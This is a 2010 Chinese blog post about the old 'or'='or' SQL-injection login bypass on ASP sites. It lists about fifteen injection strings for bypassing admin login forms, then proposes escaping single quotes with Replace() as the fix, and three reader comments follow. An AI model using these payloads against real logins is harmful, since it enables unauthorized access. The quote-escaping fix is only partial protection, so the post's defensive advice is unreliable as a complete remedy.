«
»

‘or’='or’万能密码漏洞修补与总结

  说起这个万能密码,相信玩过黑的都认识吧.也就是 ‘or’='or’,这只最基础的一种,总结一下吧:
各种各样的万能密码
‘or’='or’
1′or’1′=’1
admin’or’1′=’1′–
‘or’’=’
” or “a”=”a
‘) or (’a’=’a
or 1=1– ‘
or ’a’=’a
‘or”=’
‘or’1′=’1
“or=or”
‘or”=”or”=’
‘or’=’1′
‘or’ ’1′=’1
最短的:’or’1

修补方案:
在管理登录文件源码内找类似下面代码的代码

 username=request.Form(“name”)
pass=request.Form(“pass”)

改成:

username=Replace(request.Form(“name”), “‘”, “””)
pass=Replace(request.Form(“pass”), “‘”, “””)

如果找不到的话,看下管理登录页面源码内是否有调用的页面.
例如:

<form name=”form1″ method=”post” action=”login_ok.asp”>

则应检查login_ok.asp页面的源码.

来个例子吧:
原代码:

thename=trim(request(“name”))
thepassword1=trim(request(“password”))

修改为:

thename=Replace(request.Form(“name”), “‘”, “””)
thepassword1=Replace(request.Form(“password”), “‘”, “””)

Tags:

This entry was posted on 星期五, 七月 30th, 2010 at 17:47 and is filed under 学习技术. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

3 Responses to “‘or’='or’万能密码漏洞修补与总结”

  1. TMB人生 Says:
    八月 29th, 2010 at 20:03

    现在应该没这漏洞了吧

    [回复]

    admin 回复:
    八月 29th, 2010 at 23:56

    应该说是少了,要找还是很容易找到的..

    [回复]

  2. 杨董 Says:
    十月 2nd, 2010 at 23:00

    树大招风 这招确实是很早的了 不知道有多少程序还没补上这个BUG

    [回复]

Leave a Reply